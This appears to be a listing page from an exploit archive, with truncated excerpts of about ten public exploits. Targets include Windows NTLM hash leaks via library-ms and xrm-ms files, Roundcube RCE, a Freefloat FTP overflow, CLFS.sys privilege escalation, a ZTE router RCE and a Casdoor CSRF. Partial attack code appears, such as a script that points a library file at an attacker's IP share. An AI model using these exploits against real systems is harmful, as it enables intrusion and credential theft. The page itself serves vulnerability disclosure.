Windows File Explorer Windows 10 Pro x64 – TAR Extraction

import os import tarfile def main(): file_name = input(“Enter your file name: “) ip_address = input(“Enter IP (EX: 192.168.1.162): “) library_content = f””” \\\\{ip_address}\\IT “”” library_file_name = f”{file_name}.library-ms” with open(library_file_name, “w”, encoding=”utf-8″) as f: f.write(library_content) tar_name = “exploit.tar” with tarfile.open(tar_name, “w”) as tarf: …

Roundcube 1.6.10 – Remote Code Execution (RCE)

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, ‘Name’ => ‘Roundcube ≤ 1.6.10 Post-Auth RCE via PHP Object Deserialization’, ‘Description’ => %q{ Roundcube Webmail before 1.5.10…

Freefloat FTP Server 1.0 – Remote Buffer Overflow

# Exploit Title: Freefloat FTP Server 1.0 – Remote Buffer Overflow # Date: 22 may 2025 # Notification vendor: No reported # Discovery by: Fernando Mengali # LinkedIn: https://www.linkedin.com/in/fernando-mengali-273504142/ # Version: 1.0 # Tested on: Windows XP SP3 English – # Version 5.1 (Build 2600.xpsp.080413-2111 : Service Pack 3) # Vulnerability Type: Remote Buffer Overflow …

Microsoft Windows 11 23h2 – CLFS.sys Elevation of Privilege

# Exploit Title: Microsoft Windows 11 23h2 – CLFS.sys Elevation of Privilege # Date: 2025-04-16 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: miladgrayhat@gmail.com # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # MiRROR-H: https://mirror-h.org/search/hacker/49626/ # CVE: CVE-2024-49138 #include #include #include #include #include #include #include #include #include #include…

unzip-stream 0.3.1 – Arbitrary File Write

# Exploit Title: unzip-stream 0.3.1 – Arbitrary File Write # Date: 18th April, 2024 # Exploit Author: Ardayfio Samuel Nii Aryee # Software link: https://github.com/mhr3/unzip-stream # Version: unzip-stream 0.3.1 # Tested on: Ubuntu # CVE: CVE-2024-42471 # NB: Python’s built-in `zipfile` module has limitations on the `arcname` parameter. # To bypass…

Microsoft – NTLM Hash Disclosure Spoofing (library-ms)

# Exploit title: Microsoft – NTLM Hash Disclosure Spoofing (library-ms) # Exploit Author: John Page (aka hyp3rlinx) # x.com/hyp3rlinx # ISR: ApparitionSec Back in 2018, I reported a “.library-ms” File NTLM information disclosure vulnerability to MSRC and was told “it was not severe enough”, that being said I post it anyways. Seven years passed,…

ZTE ZXV10 H201L – RCE via authentication bypass

# Exploit Title: ZTE ZXV10 H201L – RCE via authentication bypass # Exploit Author: l34n (tasos meletlidis) # https://i0.rs/blog/finding-0click-rce-on-two-zte-routers/ import http.client, requests, os, argparse, struct, zlib from io import BytesIO from os import stat from Crypto.Cipher import AES def login(session, host, port, username, password): login_token = session.get(f”http://{host}:{port}/”).text.split(“getObj(\”Frm_Logintoken\”).value = \””)[1].split(“\””)[0] headers = { …

Daikin Security Gateway 14 – Remote Password Reset

# Daikin Security Gateway 214 – Remote Password Reset # Vendor: Daikin Industries, Ltd. # Product web page: https://www.daikin.com # https://www.daikin.eu/en_us/products/product.html/DRGATEWAYAA.html # Affected version: App: 100, Frm: 214 # # Summary: The Security gateway allows the iTM and LC8 controllers # to connect through the Security gateway to the Daikin Cloud Service. # Instead of…

Microsoft Windows – XRM-MS File NTLM Information Disclosure Spoofing

# Exploit Author: John Page (aka hyp3rlinx) # Website: hyp3rlinx.altervista.org # Source: https://hyp3rlinx.altervista.org/advisories/Microsoft_Windows_xrm-ms_File_NTLM-Hash_Disclosure.txt # x.com/hyp3rlinx # ISR: ApparitionSec [Vendor] www.microsoft.com [Product] .xrm-ms File Type [Vulnerability Type] NTLM Hash Disclosure (Spoofing) [Video URL PoC] [CVE Reference] N/A [Security Issue] The Windows XRM-MS…

Casdoor 1.901.0 – Cross-Site Request Forgery (CSRF)

# Exploit Title: Casdoor 1.901.0 – Cross-Site Request Forgery (CSRF) # Application: Casdoor # Version: 1.901.0 # Date: 03/07/2024 # Exploit Author: Van Lam Nguyen # Vendor Homepage: https://casdoor.org/ # Software Link: https://github.com/casdoor/casdoor/archive/refs/tags/v1.901.0.zip # Tested on: Windows # CVE : N/A Overview ================================================== Casdoor v1.901.0 and below was discovered to contain a Cross-Site…
